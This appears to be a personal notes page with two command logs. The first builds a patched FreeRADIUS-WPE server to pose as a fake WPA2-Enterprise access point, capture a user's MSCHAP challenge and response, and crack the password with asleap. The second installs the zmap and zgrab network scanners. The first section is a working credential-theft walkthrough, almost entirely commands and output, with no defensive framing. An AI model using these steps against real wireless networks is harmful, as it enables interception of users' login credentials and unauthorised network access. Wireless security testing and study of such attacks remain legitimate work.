# Cracking WPA2 enterprise wireless networks with Freeradius WPE and a fake AP


# wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
# wget --no-check-certificate https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
# tar xvjf freeradius-server-2.1.12.tar.bz2
# cd freeradius-server-2.1.12
# patch -p1 < ../freeradius-wpe.patch
# ./configure
# make
# make install
# ldconfig
# cd /usr/local/etc/raddb/certs/
# ./bootstrap
# /usr/local/sbin/radiusd -v
radiusd: FreeRADIUS-WPE Version 2.1.12
# grep with_ntdomain_hack /usr/local/etc/raddb/modules/mschap
with_ntdomain_hack = yes
# radiusd -X

# cat /usr/local/var/log/radius/freeradius-server-wpe.log
mschap: Sun Jan 31 22:00:00 2016

 username: aaaaaaa
 challenge: 6e:61:f4:26:7a:c5:96:12
 response: 0c:b6:46:9e:0f:70:fb:e7:ba:6b:0d:72:7a:71:63:fa:c2:e3:5b:c5:eb:04:6c:b5
 john NETNTLM: aaaaaaa:$NETNTLM$6e61f4267ac59612$0cb6469e0f70fbe7ba6b0d727a7163fac2e35bc5eb046cb5

# asleap -C 6e:61:f4:26:7a:c5:96:12 -R 0c:b6:46:9e:0f:70:fb:e7:ba:6b:0d:72:7a:71:63:fa:c2:e3:5b:c5:eb:04:6c:b5 -W dictionary.txt

 hash bytes: 5b0a
 NT hash: 2aff86e7f6e8bd54841a7981c0a55b0a
 password: bbbbbbbb

Reference

https://github.com/brad-anton/freeradius-wpe

# Installing zmap and zgrab from sources


# cd
# mkdir work
# cd work
# git clone https://github.com/zmap/zmap.git
# apt-get install build-essential cmake libgmp3-dev gengetopt libpcap-dev flex byacc libjson-c-dev pkg-config libunistring-dev
# cd zmap
# cmake .
# make -j4
# make install
# cd
# wget https://storage.googleapis.com/golang/go1.5.3.linux-amd64.tar.gz
# tar -C /usr/local -xzf go1.5.3.linux-amd64.tar.gz
# export PATH=$PATH:/usr/local/go/bin
# go version
# export GOPATH=/root/work
# go get github.com/zmap/zgrab
# cd work/src/github.com/zmap/zgrab/
# go build